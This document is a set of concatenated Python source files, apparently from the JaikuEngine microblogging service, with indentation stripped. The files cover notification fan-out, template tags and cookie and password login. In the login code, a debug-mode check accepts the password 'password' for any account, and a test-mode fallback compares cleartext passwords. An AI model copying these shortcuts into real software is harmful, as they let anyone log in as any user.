new_entry_ref = entry_get(ROOT, entry_keyname)
my_progress = progress[len('notifications:'):]
# SUBSTAGES! Oh my!
if not my_progress:
my_progress = 'im:'
if my_progress.startswith('im:'):
my_progress = my_progress[len('im:'):]
notification_type = 'im'
next_notification_type = 'sms'
initial_inboxes = _who_cares_im_initial(actor_ref,
new_entry_ref,
entry_ref)
follower_inboxes, more = _who_cares_im(new_entry_ref,
progress=my_progress,
skip=initial_inboxes)
# The first time through we'll want to include the initial inboxes, too
if not my_progress:
follower_inboxes = initial_inboxes + follower_inboxes
elif my_progress.startswith('sms:'):
my_progress = my_progress[len('sms:'):]
notification_type = 'sms'
next_notification_type = 'email'
initial_inboxes = _who_cares_sms_initial(actor_ref,
new_entry_ref,
entry_ref)
follower_inboxes, more = _who_cares_sms(new_entry_ref,
progress=my_progress,
skip=initial_inboxes)
# The first time through we'll want to include the initial inboxes, too
if not my_progress:
follower_inboxes = initial_inboxes + follower_inboxes
elif my_progress.startswith('email:'):
my_progress = my_progress[len('email:'):]
notification_type = 'email'
next_notification_type = None
initial_inboxes = _who_cares_email_initial(actor_ref,
new_entry_ref,
entry_ref)
follower_inboxes, more = _who_cares_email(new_entry_ref,
progress=my_progress,
skip=initial_inboxes)
# The first time through we'll want to include the initial inboxes, too
if not my_progress:
follower_inboxes = initial_inboxes + follower_inboxes
# Back to things that happen regardless of notification type
last_inbox = None
if follower_inboxes:
last_inbox = follower_inboxes[-1]
# We update the task first so that we don't accidentally send duplicate
# notifications, it's not ideal but best we can do for now
if more or next_notification_type:
if more and last_inbox:
next_progress = 'notifications:%s:%s' % (notification_type,
last_inbox)
else:
next_progress = 'notifications:%s:' % (next_notification_type)
try:
task_ref = task_update(ROOT,
task_ref.actor,
task_ref.action,
task_ref.action_id,
progress=next_progress,
unlock=True)
except exception.Error:
exception.log_exception()
# That's it! I can hardly believe it.
else:
task_remove(ROOT,
task_ref.actor,
task_ref.action,
task_ref.action_id
)
# perform the notifications
_notify_subscribers_for_entry_by_type(notification_type,
follower_inboxes,
actor_ref,
new_stream_ref,
new_entry_ref,
entry_ref=entry_ref,
entry_stream_ref=entry_stream_ref
)
return new_entry_ref
# TODO(termie): what a mess.
def _add_entry(new_stream_ref, new_values, entry_ref=None):
"""Adds an entry to a stream and returns the created StreamEntry object. """
# TODO should probably check for previous entries to prevent dupes here
# TODO check url for feed entries
# TODO check content for comments
# TODO check title for basic entries
# for presence updates, this looks like 'stream/<nick>/presence/NNNN'
key_name = StreamEntry.key_from(**new_values)
if entry_get_uuid(ROOT, new_values['uuid']):
raise exception.ApiException(
0x00, "Duplicate entry, uuid %s already used" % new_values['uuid'])
# Now the key is uuid and this check duplicates the above, but we will change
# the key to use the slug later.
try:
existing = entry_get(ROOT, key_name)
except exception.ApiDeleted:
existing = True
except exception.ApiException:
existing = False
if existing:
raise exception.ApiException(0x00, "Duplicate entry, key %s already used" %
key_name)
new_entry_ref = StreamEntry(**new_values)
new_entry_ref.put()
# TODO(termie): this can pretty easily get out of sync, we should probably
# do something like what we do with follower counts
if new_entry_ref.is_comment():
entry_ref.extra.setdefault('comment_count', 0)
entry_ref.extra['comment_count'] += 1
entry_ref.put()
# subscribe the author of the comment to future comments on this entry
# NOTE: using ROOT because if a user has already commented on this entry
# then they can see it to subscribe
    subscription_ref = subscription_request(
ROOT,
topic=entry_ref.keyname(),
target='inbox/%s/overview' % new_entry_ref.actor
)
else:
if not new_entry_ref.is_channel():
presence_set(ROOT,
new_entry_ref.actor,
presenceline={
'description': new_entry_ref.extra['title'],
'since': new_entry_ref.created_at})
return new_entry_ref
def _add_inbox(stream_ref, entry_ref, inboxes, shard):
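  """Writes one InboxEntry fan-out row for the entry, covering the supplied
  list of inbox keys (e.g. 'inbox/<nick>/overview'); shard distinguishes the
  multiple rows written for the same entry.
  """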
#logging.info('add_inbox %s|%s: %s', entry_ref.keyname(), shard, inboxes)
values = {"stream": entry_ref.stream,
"stream_type": stream_ref.type,
"uuid": entry_ref.uuid,
"created_at": entry_ref.created_at,
"inbox": inboxes,
"shard": shard,
}
if entry_ref.entry:
values['entry'] = entry_ref.entry
inbox_ref = InboxEntry(**values)
inbox_ref.put()
return inbox_ref
def _who_cares_web(entry_ref, progress=None, limit=None, skip=None):
""" figure out who wants to see this on the web
From the who_cares diagram we want
Cs - comments on entries you wrote IGNORE already covered by initial_inboxes
  Cx - comments on entries you've commented on
Uu - user updates
Uc - channel updates
  Cu - user comments
Twisting that around in terms of subscribers:
subscribers to the stream for this item: entry_ref.stream (Uu, Uc, Cu)
if this is a comment, subscribers to the entry: entry_ref.entry (Cx)
"""
limit = limit is None and MAX_FOLLOWERS_PER_INBOX or limit
topic_keys = [entry_ref.stream]
if entry_ref.is_comment():
topic_keys.append(entry_ref.entry)
entry_stream_ref = stream_get(ROOT, entry_ref.extra.get('entry_stream'))
actor_ref = actor_get(ROOT, entry_ref.actor)
is_restricted = (entry_stream_ref.is_restricted() or
actor_ref.is_restricted())
else:
stream_ref = stream_get(ROOT, entry_ref.stream)
is_restricted = stream_ref.is_restricted()
targets, more = _paged_targets_for_topics(topic_keys,
is_restricted,
progress=progress,
limit=limit)
if skip:
targets = [t for t in targets if t not in skip]
return targets, more
def _who_cares_web_initial(actor_ref, new_entry_ref, entry_ref=None):
inboxes = []
# actor-private
# actor-overview
# If this is a comment
# entry-comments
# entry-actor-overview
# If actor is public
# If not on a channel stream
# If on a public stream
# actor-contacts
# actor-public
#
# If this is not a comment
# If this is on a channel
# channel-private
# channel-contacts
# If channel is public:
# channel-public
# If not channel
# actor-contacts
# If actor is public
# actor-public
# root-explore
inboxes.append('inbox/%s/private' % new_entry_ref.actor)
inboxes.append('inbox/%s/overview' % new_entry_ref.actor)
if new_entry_ref.is_comment():
inboxes.append('%s/comments' % new_entry_ref.entry)
inboxes.append('inbox/%s/overview' % entry_ref.actor)
if actor_ref.is_public():
if not new_entry_ref.is_channel():
inboxes.append('inbox/%s/contacts' % new_entry_ref.actor)
inboxes.append('inbox/%s/public' % new_entry_ref.actor)
else:
if new_entry_ref.is_channel():
inboxes.append('inbox/%s/private' % new_entry_ref.owner)
inboxes.append('inbox/%s/contacts' % new_entry_ref.owner)
channel_ref = actor_get(ROOT, new_entry_ref.owner)
if channel_ref.is_public():
inboxes.append('inbox/%s/public' % new_entry_ref.owner)
else:
inboxes.append('inbox/%s/contacts' % new_entry_ref.actor)
if actor_ref.is_public():
inboxes.append('inbox/%s/public' % new_entry_ref.actor)
inboxes.append('inbox/%s/explore' % ROOT.nick)
return inboxes
def _who_cares_im(entry_ref, progress=None, limit=None, skip=None):
""" who cares about im? the same people as the web! """
limit = limit is None and MAX_NOTIFICATIONS_PER_TASK or limit
return _who_cares_web(entry_ref, progress=progress, limit=limit, skip=skip)
def _who_cares_im_initial(actor_ref, new_entry_ref, entry_ref):
return _who_cares_web_initial(actor_ref, new_entry_ref, entry_ref)
def _who_cares_email(entry_ref, progress=None, limit=None, skip=None):
""" figure out who wants to get an email about this
From the who_cares diagram we want
Cs - comments on entries you wrote IGNORE already covered by initial_inboxes
  Cx - comments on entries you've commented on
Twisting that around in terms of subscribers:
if this is a comment, subscribers to the entry: entry_ref.entry (Cx)
"""
limit = limit is None and MAX_NOTIFICATIONS_PER_TASK or limit
if not entry_ref.is_comment():
return [], None
topic_keys = []
topic_keys.append(entry_ref.entry)
entry_stream_ref = stream_get(ROOT, entry_ref.extra.get('entry_stream'))
is_restricted = entry_stream_ref.is_restricted()
targets, more = _paged_targets_for_topics(topic_keys,
is_restricted,
progress=progress,
limit=limit)
# we always want to skip the actor who made this action
# (unless we make that a setting in the future)
if not skip:
skip = []
skip.append('inbox/%s/overview' % entry_ref.actor)
targets = [t for t in targets if t not in skip]
return targets, more
def _who_cares_email_initial(actor_ref, new_entry_ref, entry_ref=None):
# If is a comment and not by the author of the entry it is on
# entry-actor-overview (Cs)
if new_entry_ref.is_comment() and new_entry_ref.actor != entry_ref.actor:
return ['inbox/%s/overview' % entry_ref.actor]
return []
def _who_cares_sms(entry_ref, progress=None, limit=None, skip=None):
""" figure out who wants to get an sms about this
From the who_cares diagram we want
Cs - comments on entries you wrote IGNORE already covered by initial_inboxes
  Cx - comments on entries you've commented on
Uu - user updates
Uc - channel updates
Twisting that around in terms of subscribers:
if not a comment, subscribers to the stream for this item:
entry_ref.stream (Uu, Uc, -Cu)
if this is a comment, subscribers to the entry: entry_ref.entry (Cx)
"""
limit = limit is None and MAX_NOTIFICATIONS_PER_TASK or limit
topic_keys = []
if entry_ref.is_comment():
topic_keys.append(entry_ref.entry)
entry_stream_ref = stream_get(ROOT, entry_ref.extra.get('entry_stream'))
actor_ref = actor_get(ROOT, entry_ref.actor)
is_restricted = (entry_stream_ref.is_restricted() or
actor_ref.is_restricted())
else:
topic_keys = [entry_ref.stream]
stream_ref = stream_get(ROOT, entry_ref.stream)
is_restricted = stream_ref.is_restricted()
targets, more = _paged_targets_for_topics(topic_keys,
is_restricted,
progress=progress,
limit=limit)
# we always want to skip the actor who made this action
# (unless we make that a setting in the future)
if not skip:
skip = []
skip.append('inbox/%s/overview' % entry_ref.actor)
targets = [t for t in targets if t not in skip]
return targets, more
def _who_cares_sms_initial(actor_ref, new_entry_ref, entry_ref=None):
# If is a comment and not by the author of the entry it is on
# entry-actor-overview (Cs)
if new_entry_ref.is_comment() and new_entry_ref.actor != entry_ref.actor:
return ['inbox/%s/overview' % entry_ref.actor]
return []
def _paged_targets_for_topics(topic_keys, is_restricted=True, progress=None,
limit=MAX_FOLLOWERS_PER_INBOX):
# If you're a little worried about how this works, hopefully this
# horrible little diagram will help ease your fears (or find out how
# we are doing it wrong and help us fix it)
#
# Example Time!
# We fetch the subscription targets for both the comments stream
# as well as for the entry, example:
#
# ............... ............... ...............
# limit = 4 limit = 4 limit = 4
# progress = None progress = D progress = H
# full data full data full data
# stream entry stream entry stream entry
# ------ ----- ------ ----- ------ -----
# A A A
# B B B B B B
# C C C
# D D D D D D
# E E E E E E
# F F F
# G G G
# H H H
# I I I
# J J J
# fetched data fetched data fetched data
# stream entry stream entry stream entry
# ------ ----- ------ ----- ------ -----
# A E E I
# B B F J
# C G
# D D H
# --- I
# E E J
# F
# G
# ---
# H
# I
# J
# merged more merged more merged more
# ------ ----- ------ ----- ------ -----
# A yes E yes I yes
# B F J
# C G
# D H
subs = []
for topic in topic_keys:
subs += subscription_get_topic(ROOT,
topic,
limit=limit +1,
offset=progress)
# unique and sort
targets = sorted(list(set([s.target for s in subs])))
#logging.info('targets! %s', targets)
# paging
more = False
if len(targets) > limit:
more = True
targets = targets[:limit]
# Alright, we've handled all that stuff described in the note above
# now we need to filter out the subscriptions that aren't subscribed
if is_restricted:
good_targets = [s.target for s in subs if (s.is_subscribed())]
targets = sorted(list(set(targets).intersection(set(good_targets))))
return targets, more
def _paged_add_inbox(inboxes, stream_ref, entry_ref):
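  """Adds a single inbox fan-out row for one page of follower inboxes and
  returns the last inbox key in the page (used as the paging cursor), or
  None if the page was empty.
  """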
if inboxes:
last_inbox = inboxes[-1]
# TODO(termie): maybe we should come up with a better shard identifier?
# theoretically, upon replay of this item the last item
# could change (a subscriber goes away) and we duplicate
# the inbox entry
inbox_ref = _add_inbox(stream_ref,
entry_ref,
inboxes,
shard=last_inbox)
return last_inbox
return None
# half squewl
def _notify_subscribers_for_entry_by_type(notification_type, inboxes,
actor_ref, new_stream_ref,
new_entry_ref, entry_ref=None,
entry_stream_ref=None):
# TODO(termie): this is not the most efficient way to do this at all
# it'd be nice if the subscription encoded the information
# about whether there should be im or sms delivery
# so that we at least have a smaller subset to work with
if notification_type == 'im':
_notify_im_for_entry(inboxes,
actor_ref,
new_stream_ref,
new_entry_ref,
entry_ref=entry_ref,
entry_stream_ref=entry_stream_ref)
elif notification_type == 'sms':
_notify_sms_for_entry(inboxes,
actor_ref,
new_stream_ref,
new_entry_ref,
entry_ref=entry_ref,
entry_stream_ref=entry_stream_ref)
elif notification_type == 'email':
_notify_email_for_entry(inboxes,
actor_ref,
new_stream_ref,
new_entry_ref,
entry_ref=entry_ref,
entry_stream_ref=entry_stream_ref)
def _notify_email_for_entry(inboxes, actor_ref, new_stream_ref, new_entry_ref,
entry_ref=None, entry_stream_ref=None):
if not new_entry_ref.is_comment():
return
subscribers = [util.get_user_from_topic(inbox) for inbox in inboxes]
subscribers = list(set(subscribers))
subscribers_ref = actor_get_actors(ROOT, subscribers)
subscribers_ref = [v for k, v in subscribers_ref.iteritems() if v]
_notify_email_subscribers_for_comment(subscribers_ref,
actor_ref,
new_entry_ref,
entry_ref)
def _notify_im_for_entry(inboxes, actor_ref, new_stream_ref, new_entry_ref,
entry_ref=None, entry_stream_ref=None):
subscribers = [util.get_user_from_topic(inbox) for inbox in inboxes]
subscribers = list(set(subscribers))
subscribers_ref = actor_get_actors(ROOT, subscribers)
subscribers_ref = [v for k, v in subscribers_ref.iteritems() if v]
# TODO(termie): merge these
if new_entry_ref.is_comment():
_notify_im_subscribers_for_comment(subscribers_ref,
actor_ref,
new_entry_ref,
entry_ref)
else:
_notify_im_subscribers_for_entry(subscribers_ref,
actor_ref,
entry_stream_ref,
new_entry_ref)
def _notify_sms_for_entry(inboxes, actor_ref, new_stream_ref, new_entry_ref,
entry_ref=None, entry_stream_ref=None):
subscribers = [util.get_user_from_topic(inbox) for inbox in inboxes]
subscribers = list(set(subscribers))
subscribers_ref = actor_get_actors(ROOT, subscribers)
subscribers_ref = [v for k, v in subscribers_ref.iteritems() if v]
mobile_numbers = []
for subscriber_ref in subscribers_ref:
if not subscriber_ref.extra.get('sms_notify'):
continue
mobile = mobile_get_actor(ROOT, subscriber_ref.nick)
if not mobile:
continue
mobile_numbers.append(mobile)
if not mobile_numbers:
return
sms_connection = sms.SmsConnection()
if new_entry_ref.is_comment():
template = '%s^%s: %s'
title = entry_ref.title()
firsts = smashed_title_re.findall(title)
smashed_title = ''.join(firsts[:6])
content = new_entry_ref.extra.get('content', '')
if len(content) > 200:
content = content[:20] + '...'
message = template % (actor_ref.display_nick(), smashed_title, content)
reply_key = entry_ref.keyname()
else:
template = '%s: %s'
content = new_entry_ref.title()
if len(content) > 200:
content = content[:20] + '...'
message = template % (actor_ref.display_nick(), content)
reply_key = new_entry_ref.keyname()
sms_connection.send_message(mobile_numbers, message)
_reply_add_cache_sms(actor_ref, subscribers_ref, reply_key)
# old skewl: legacy helpers for computing subscriber/inbox lists and notifying them
def _subscribers_for_entry(stream_ref, entry_ref):
"""
Computes the list of streams that should be updated when a post is made.
Returns the list.
"""
# the users subscribed to the stream this entry is going to
subscribers = subscription_get_topic(ROOT, stream_ref.key().name())
if stream_is_private(ROOT, stream_ref.key().name()):
# LEGACY COMPAT: the 'or' in there is for legacy compat
subscribers = [s.target for s in subscribers
if (s.state == 'subscribed' or s.state == None)]
else:
subscribers = [s.target for s in subscribers]
# the explore page if this isn't a comment
if stream_ref.type != 'comment' and not stream_ref.owner.startswith('#'):
subscribers.append('inbox/%s/explore' % ROOT.nick)
# the views of the entry owner
if stream_ref.read > PRIVACY_CONTACTS:
subscribers.append('inbox/%s/public' % entry_ref.owner)
if stream_ref.read > PRIVACY_PRIVATE:
subscribers.append('inbox/%s/contacts' % entry_ref.owner)
subscribers.append('inbox/%s/private' % entry_ref.owner)
subscribers.append('inbox/%s/overview' % entry_ref.owner)
subscribers = list(set(subscribers))
return subscribers
def _subscribers_for_comment(comments_stream_ref, stream_ref,
entry_ref, comment_ref):
# the users subscribed to the user's comment stream
subscribers = subscription_get_topic(ROOT, comments_stream_ref.key().name())
if stream_is_private(ROOT, stream_ref.key().name()):
# LEGACY COMPAT: the 'or' in there is for legacy compat
subscribers = [s.target for s in subscribers
if (s.state == 'subscribed' or s.state == None)]
else:
subscribers = [s.target for s in subscribers]
# the users subscribed to this entry (commenters)
entry_subscribers = subscription_get_topic(ROOT, entry_ref.key().name())
subscribers += [s.target
for s in entry_subscribers
if s.state == 'subscribed']
# the entry this is on
subscribers.append(entry_ref.key().name() + "/comments")
# the views of this commenter, only if entry is public
if (comments_stream_ref.read > PRIVACY_CONTACTS and
stream_ref.read > PRIVACY_CONTACTS):
subscribers.append('inbox/%s/public' % comment_ref.actor)
if (comments_stream_ref.read > PRIVACY_PRIVATE and
stream_ref.read > PRIVACY_CONTACTS):
subscribers.append('inbox/%s/contacts' % comment_ref.actor)
# the private views of the commenter
subscribers.append('inbox/%s/private' % comment_ref.actor)
subscribers.append('inbox/%s/overview' % comment_ref.actor)
# the overview of the entry owner (for channels) and actor
subscribers.append('inbox/%s/overview' % entry_ref.owner)
subscribers.append('inbox/%s/overview' % entry_ref.actor)
subscribers = list(set(subscribers))
return subscribers
def _add_inboxes_for_entry(inboxes, stream_ref, entry_ref):
values = {"stream": entry_ref.stream,
"stream_type": stream_ref.type,
"uuid": entry_ref.uuid,
"created_at": entry_ref.created_at,
"inbox": inboxes,
"shard": inboxes[-1],
}
if entry_ref.entry:
values['entry'] = entry_ref.entry
inbox_entry = InboxEntry(**values)
inbox_entry.put()
return inbox_entry
def _notify_subscribers_for_entry(inboxes, actor_ref, stream_ref,
entry_ref):
subscribers = [util.get_user_from_topic(inbox) for inbox in inboxes]
subscribers = list(set(subscribers))
subscribers_ref = actor_get_actors(ROOT, subscribers)
subscribers_ref = [v for k, v in subscribers_ref.iteritems() if v]
_notify_im_subscribers_for_entry(subscribers_ref,
actor_ref,
stream_ref,
entry_ref)
def _notify_subscribers_for_comment(actor_ref, comment_ref, entry_ref):
# get the list of subscribers to this entry (owner and commenters)
inboxes = ['inbox/%s/overview' % entry_ref.actor]
entry_subscribers = subscription_get_topic(ROOT, entry_ref.key().name())
inboxes += [s.target
for s in entry_subscribers
if s.state == 'subscribed']
subscribers = [util.get_user_from_topic(inbox) for inbox in inboxes]
subscribers = list(set(subscribers))
subscribers_ref = actor_get_actors(ROOT, subscribers)
subscribers_ref = [v for k, v in subscribers_ref.iteritems() if v]
_notify_email_subscribers_for_comment(subscribers_ref,
actor_ref,
comment_ref,
entry_ref)
_notify_im_subscribers_for_comment(subscribers_ref,
actor_ref,
comment_ref,
entry_ref)
def _notify_email_subscribers_for_comment(subscribers_ref, actor_ref,
comment_ref, entry_ref):
for subscriber_ref in subscribers_ref:
if not subscriber_ref.extra.get('email_notify'):
continue
email = email_get_actor(ROOT, subscriber_ref.nick)
if not email:
continue
if subscriber_ref.nick == actor_ref.nick:
continue
subject, message = mail.email_comment_notification(
subscriber_ref,
actor_ref,
comment_ref,
entry_ref)
email_send(ROOT, email, subject, message)
def _notify_im_subscribers_for_comment(subscribers_ref, actor_ref,
comment_ref, entry_ref):
xmpp_connection = xmpp.XmppConnection()
im_aliases = []
for subscriber_ref in subscribers_ref:
if not subscriber_ref.extra.get('im_notify'):
continue
im = im_get_actor(ROOT, subscriber_ref.nick)
if not im:
continue
im_aliases.append(im)
if not im_aliases:
return
# TODO(termie): add more info if this is a channel
# TODO(termie): add link to post
excerpt = entry_ref.title()
if len(excerpt) > 24:
excerpt = excerpt[:20] + u"\u2026"
content = comment_ref.extra.get('content', '')
# TODO(termie): support html messages
message = '%s: %s (on %s)' % (actor_ref.display_nick(), content, excerpt)
xmpp_connection.send_message(im_aliases, message)
_reply_add_cache_im(actor_ref, subscribers_ref, entry_ref.keyname())
def _notify_im_subscribers_for_entry(subscribers_ref, actor_ref, stream_ref, entry_ref):
xmpp_connection = xmpp.XmppConnection()
im_aliases = []
for subscriber_ref in subscribers_ref:
if not subscriber_ref.extra.get('im_notify'):
continue
im = im_get_actor(ROOT, subscriber_ref.nick)
if not im:
continue
im_aliases.append(im)
if not im_aliases:
return
# TODO(termie): add link to post
excerpt = entry_ref.title()
from_nick = actor_ref.display_nick()
# if this is a channel add more info
if entry_ref.owner != entry_ref.actor:
owner_ref = actor_get(ROOT, entry_ref.owner)
from_nick += owner_ref.display_nick()
# TODO(termie): support html messages
message = '%s: %s' % (from_nick, excerpt)
xmpp_connection.send_message(im_aliases, message)
_reply_add_cache_im(actor_ref, subscribers_ref, entry_ref.keyname())
def _notify_new_contact(owner_ref, target_ref):
if not target_ref.extra.get('email_notify'):
return
email = email_get_actor(ROOT, target_ref.nick)
if not email:
return
# using ROOT for internal functionality
mutual = actor_has_contact(ROOT, target_ref.nick, owner_ref.nick)
if mutual:
subject, message, html_message = mail.email_new_follower_mutual(
owner_ref, target_ref)
else:
subject, message, html_message = mail.email_new_follower(
owner_ref, target_ref)
email_send(ROOT, email, subject, message, html_message=html_message)
# Helpers for replying via @nick
def _reply_cache_key(sender, target, service=''):
memcache_key = 'reply/%s/%s/%s' % (service, sender, target)
return memcache_key
def _reply_add_cache(sender_ref, target_refs, entry, service=''):
"""Add an entry in the memcache, matching each outgoing IM message
from a given actor to a set of actors, so that reply-by-IM works
with '@actor comment' syntax.
PARAMETERS:
sender_ref - actor who posted the entry
target_refs - list of actors receiving notification
entry - key for the entry posted
"""
memcache_entry = {}
for target_ref in target_refs:
memcache_key = _reply_cache_key(sender_ref.nick,
target_ref.nick,
service=service)
memcache_entry[memcache_key] = entry
memcache.client.set_multi(memcache_entry)
def _reply_add_cache_im(sender_ref, target_refs, entry):
return _reply_add_cache(sender_ref, target_refs, entry, service='im')
def _reply_add_cache_sms(sender_ref, target_refs, entry):
return _reply_add_cache(sender_ref, target_refs, entry, service='sms')
def reply_get_cache(sender, target, service=''):
""" get the last entry from sender seen by target on service
Note: this has a somewhat misleading signature, it is generally called
in the processing of an @nick post, in which case the target is the
user making the post and the sender is the @nick.
"""
entry_ref = None
sender_ref = actor_lookup_nick(ROOT, sender)
target_ref = actor_lookup_nick(ROOT, target)
memcache_key = _reply_cache_key(sender_ref.nick,
target_ref.nick,
service=service)
stream_key = memcache.client.get(memcache_key)
if stream_key:
entry_ref = entry_get(ROOT, stream_key)
if not entry_ref:
# TODO(termie): should work for non-public users too
inbox = inbox_get_actor_public(sender_ref,
target_ref.nick,
limit=1,
stream_type='presence')
if not inbox:
logging.info('reply_get_cache: no inbox found')
return
logging.info('reply_get_cache: falling back to inbox %s', inbox)
entry_ref = entry_get(sender_ref, inbox[0])
return entry_ref
def _email_from_subscribers_for_comment(subscribers):
"""From a set of subscribers, get the actors.
PARAMETERS:
subscribers - returned from _subscribers_for_*
RETURNS:
[email] -- list of email aliases
"""
aliases = {}
for subscriber in subscribers:
actor = util.get_user_from_topic(subscriber)
email = email_get_actor(ROOT, actor)
# Not all actors want email updates.
if email:
# TODO(tyler): Not just if they have an email registered, but specifically
# if they have the bit flipped for wanting email.
aliases[email] = 1
return aliases.keys()
def _set_presence(api_user, **kw):
pass
# HELPER
def _limit_query(query, limit, offset):
o = []
query_it = query.run()
for i in xrange(limit + offset):
try:
x = query_it.next()
except StopIteration:
break
o.append(x)
return o[offset:(offset+limit)]
def _crop_to_square(size, dimensions):
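# Returns a crop box in relative (0..1) coordinates for a centred square of side
# dimensions[0] source pixels. Illustrative example:
#   _crop_to_square((400, 300), (300, 300)) -> (0.125, 0.0, 0.875, 1.0)
# i.e. trim 50px from each horizontal edge of a 400x300 image.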
sq = dimensions[0]
w = size[0]
h = size[1]
if size[0] > size[1]:
left_x = (size[0] - sq) / 2
right_x = left_x + sq
top_y = 0
bottom_y = sq
else:
left_x = 0
right_x = sq
top_y = (size[1] - sq) / 2
bottom_y = top_y + sq
return (float(left_x) / w, float(top_y) / h,
float(right_x) / w, float(bottom_y) / h)
```
#### File: common/templatetags/entry.py
```python
__author__ = '<EMAIL> (<NAME>)'
import urllib
from django import template
from django.template.defaultfilters import stringfilter
import django.template.defaulttags
from django.utils.safestring import mark_safe
from django.utils.html import escape
from common.util import create_nonce, safe
from common import messages
from common.templatetags.base import if_pred
import settings
register = template.Library()
def is_actor_or_owner(user, entry, is_admin = False):
if is_admin:
return True
if not user:
return False
return user.nick == entry.actor or user.nick == entry.owner
def is_not_actor(user, entry, is_admin = None):
if not user:
return False
return user.nick != entry.actor
@register.tag
def if_actor_or_owner(parser, token):
return if_pred(parser, token, is_actor_or_owner)
@register.tag
def if_not_actor(parser, token):
return if_pred(parser, token, is_not_actor)
class EntryActionNode(template.Node):
def __init__(self, var_user, var_entry, is_admin, pred, api_call, link_class, content):
self.var_user = template.Variable(var_user)
self.var_entry = template.Variable(var_entry)
self.var_is_admin = None
try:
self.var_is_admin = template.Variable(is_admin)
except:
pass
self.pred = pred
self.api_call = api_call
self.link_class = link_class
if not isinstance(content, template.Node):
self.content = template.TextNode(content)
else:
self.content = content
def render(self, context):
user = self.var_user.resolve(context)
entry = self.var_entry.resolve(context)
is_admin = None
try:
is_admin = self.var_is_admin.resolve(context)
except:
pass
if self.pred(user, entry, is_admin):
content = self.content.render(context)
return (
('<a href="?%s=%s&_nonce=%s"' +
' class="%s" title="%s">%s</a>') % (
self.api_call, urllib.quote(entry.keyname()),
create_nonce(user, self.api_call),
self.link_class, escape(messages.title(self.api_call)),
content))
else:
return ''
def entry_remove_x(parser, token, api_call):
bits = list(token.split_contents())
is_admin = None
if len(bits) != 3 and len(bits) != 4:
raise template.TemplateSyntaxError, "%r takes two or three arguments" % bits[0]
if len(bits) == 4:
is_admin = bits[3]
return EntryActionNode(bits[1], bits[2], is_admin, is_actor_or_owner,
api_call, 'confirm-delete', 'Delete')
@register.tag
def entry_remove(parser, token):
"""
Adds a Delete link for a post.
Parameters: viewer, entry, is_admin.
"""
return entry_remove_x(parser, token, 'entry_remove')
@register.tag
def entry_remove_comment(parser, token):
"""
Adds a Delete link for a comment.
Parameters: viewer, entry.
"""
return entry_remove_x(parser, token, 'entry_remove_comment')
@register.tag
def entry_mark_as_spam(parser, token):
"""
Adds a Mark as spam link for a post or comment.
Parameters: viewer, entry.
"""
if not settings.MARK_AS_SPAM_ENABLED:
return django.template.defaulttags.CommentNode()
bits = list(token.split_contents())
is_admin = None
if len(bits) != 3:
raise template.TemplateSyntaxError, "%r takes two arguments" % bits[0]
return EntryActionNode(bits[1], bits[2], is_admin, is_not_actor,
'entry_mark_as_spam', 'confirm-spam', 'Mark as spam')
```
#### File: jaikuengine/common/user.py
```python
import datetime
import logging
from django.conf import settings
from django.core.cache import cache
import oauth.oauth as oauth
from common import api
from common import exception
from common import legacy
from common import oauth_util
from common import util
def get_user_from_request(request):
"""attempt to get a logged in user based on the request
most likely from a cookie
"""
nick = request.COOKIES.get(settings.USER_COOKIE, None)
token = request.COOKIES.get(settings.PASSWORD_COOKIE, None)
if nick:
# try to authenticate the dude via cookie
user = authenticate_user_cookie(nick, token)
return user
if (settings.API_ALLOW_LEGACY_AUTH
and 'personal_key' in request.REQUEST
and 'user' in request.REQUEST):
user = legacy.authenticate_user_personal_key(
request.REQUEST['user'], request.REQUEST['personal_key'])
if user:
user.legacy = True
return user
# we may not be authenticating via cookie, check oauth also
# Note: This will have the effect that any valid OAuth request
# will effectively be treated as a logged in user with one
# small difference, api users (via OAuth, etc) are given
# a permission level of read, write or delete which limits
# what they are able to do on the site.
if (('oauth_token' in request.REQUEST and 'oauth_consumer_key' in request.REQUEST)
or 'HTTP_AUTHORIZATION' in request.META):
oauth_util.verify_request(request)
user = oauth_util.get_api_user(request)
return user
return None
def lookup_user_auth_token(nick, token):
return cache.get("user_auth_token/%s/%s" % (nick, token))
def generate_user_auth_token(nick, password, timeout=(14 * 24 * 60 * 60)):
token = util.hash_generic(util.generate_uuid())
cache.set("user_auth_token/%s/%s" % (nick, token), password, timeout)
return token
def authenticate_user_cookie(nick, token):
user = api.actor_get_safe(api.ROOT, nick)
if not user:
return None
# user's authenticated via cookie have full access
user.access_level = api.DELETE_ACCESS
cached_token = lookup_user_auth_token(user.nick, token)
if not cached_token:
return None
if user.password != cached_token:
return None
return user
def authenticate_user_login(nick, password):
user = api.actor_lookup_nick(api.ROOT, nick)
if not user:
return None
# user's authenticated via login have full access
user.access_level = api.DELETE_ACCESS
if settings.DEBUG and password == "password":
return user
if user.password == util.hash_password(user.nick, password):
return user
# we're changing the password hashing, this will update their password
# to their new format
# TODO(termie): The settings.MANAGE_PY stuff below is so that the tests
# will continue to work with fixtures that have the passwords
# in clear text. We should probably remove this and change
# the passwords in the fixtures to be the legacy-style
# passwords.
if (user.password == util.hash_password_intermediate(user.nick, password)
or settings.MANAGE_PY and user.password == password):
logging.debug("updating password for intermediate user: %s", user.nick)
user = api.actor_update_intermediate_password(api.ROOT,
user.nick,
password)
# a little repeat of above since we have a new user instance now
user.access_level = api.DELETE_ACCESS
return user
return None
def lookup_user_by_login(login, password):
"""Looks up user by a given login. Returns None on failure.
login - can be either nick or confirmed email
password - password associated with the user
"""
try:
current_user = authenticate_user_login(login, password)
if current_user:
return current_user
except exception.ValidationError:
pass # let's try the email address next
# login can be confirmed email address
actor_ref = api.actor_lookup_email(api.ROOT, login)
if actor_ref:
return authenticate_user_login(actor_ref.nick, password)
return None
def set_user_cookie(response, user, remember=False):
if remember:
two_weeks = datetime.datetime.utcnow() + datetime.timedelta(days=14)
expires = two_weeks.strftime("%a %d-%b-%y %H:%M:%S GMT")
else:
expires = None
auth_token = generate_user_auth_token(user.nick, user.password)
if settings.COOKIE_DOMAIN == "localhost":
response.set_cookie(settings.USER_COOKIE,
user.nick,
expires=expires,
path=settings.COOKIE_PATH)
response.set_cookie(settings.PASSWORD_COOKIE,
auth_token,
expires=expires,
path=settings.COOKIE_PATH)
else:
response.set_cookie(settings.USER_COOKIE,
user.nick,
expires=expires,
path=settings.COOKIE_PATH,
domain=settings.COOKIE_DOMAIN)
response.set_cookie(settings.PASSWORD_COOKIE,
auth_token,
expires=expires,
path=settings.COOKIE_PATH,
domain=settings.COOKIE_DOMAIN)
return response
def clear_user_cookie(response):
if settings.COOKIE_DOMAIN == "localhost":
response.delete_cookie(settings.USER_COOKIE, path=settings.COOKIE_PATH)
